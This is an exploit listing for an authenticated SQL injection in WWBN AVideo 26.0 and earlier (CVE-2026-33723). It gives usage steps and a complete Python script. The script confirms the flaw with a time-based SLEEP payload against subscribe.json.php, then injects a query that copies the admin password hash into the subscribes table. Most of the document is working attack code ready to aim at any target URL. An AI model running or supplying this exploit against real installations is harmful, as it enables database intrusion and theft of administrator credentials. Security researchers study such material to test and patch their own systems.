Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection CVE: CVE-2026-33723 Date: 2026-03-25 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Instagram: @banyamer_security Author GitHub: https://github.com/mbanyamer Author Blog: https://banyamersecurity.com/blog/ Vendor Homepage: https://github.com/WWBN/AVideo Software Link: https://github.com/WWBN/AVideo Affected: AVideo <= 26.0 Tested on: AVideo 26.0 Category: Web Application Platform: Linux / Windows Exploit Type: SQL Injection CVSS: 7.1 HIGH Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data. Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c Notes: • Requires valid PHPSESSID from any logged-in user (regular user is enough) • Injects data into the subscribes.email column How to Use Step 1: Login to AVideo with any user account and copy the PHPSESSID cookie value Step 2: Edit TARGET and PHPSESSID variables in the exploit script, then run it === Full Python Exploit === #!/usr/bin/env python3 # Exploit Title: WWBN AVideo <= 26.0 - Authenticated SQL Injection # CVE: CVE-2026-33723 # Date: 2026-03-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://github.com/WWBN/AVideo # Software Link: https://github.com/WWBN/AVideo # Affected: AVideo <= 26.0 # Tested on: AVideo 26.0 # Category: Web Application # Platform: Linux / Windows # Exploit Type: SQL Injection # CVSS: 7.1 # Description: Authenticated SQL Injection via user_id parameter in subscribe.json.php and subscribeNotify.json.php allowing extraction of admin password hashes and sensitive database data. # Fixed in: https://github.com/WWBN/AVideo/commit/36dfae22059fbd66fd34bbc5568a838fc0efd66c # Usage: # python3 exploit.py def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import requests import sys import time TARGET = "https://target.com" PHPSESSID = "YOUR_VALID_PHPSESSID_HERE" HEADERS = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/x-www-form-urlencoded", } COOKIES = {"PHPSESSID": PHPSESSID} def send_payload(payload, endpoint="/objects/subscribe.json.php"): data = {"user_id": payload} url = TARGET.rstrip("/") + endpoint try: r = requests.post(url, data=data, cookies=COOKIES, headers=HEADERS, timeout=15) return r except Exception as e: print(f"[-] Error: {e}") return None def main(): banner() if not PHPSESSID or PHPSESSID == "YOUR_VALID_PHPSESSID_HERE": print("[-] Please edit the script and set your valid PHPSESSID!") sys.exit(1) print(f"[*] Target : {TARGET}") print(f"[*] Session : {PHPSESSID[:15]}...\n") print("[+] Testing Time-Based SQL Injection...") start = time.time() send_payload("99999'+AND+SLEEP(5)+AND+'1") elapsed = time.time() - start print(f" Response time: {elapsed:.2f} seconds") if elapsed >= 4.5: print(" [+] Vulnerable! Time-based SQLi confirmed.") else: print(" [-] Not vulnerable or blocked.") print("\n" + "="*70) print("[+] Extracting Admin Password Hash...") extract_payload = "99999',(SELECT pass FROM users WHERE isAdmin=1 LIMIT 1),'a','1.1.1.1',now(),now(),'1'); -- -" send_payload(extract_payload) print(" [+] Payload sent successfully!") print(" [+] Admin password hash has been injected into the 'subscribes' table (email column).") print(" [+] Check your subscriptions or database to retrieve the hash.") print("\n[+] Exploit finished. Use responsibly!") if __name__ == "__main__": main()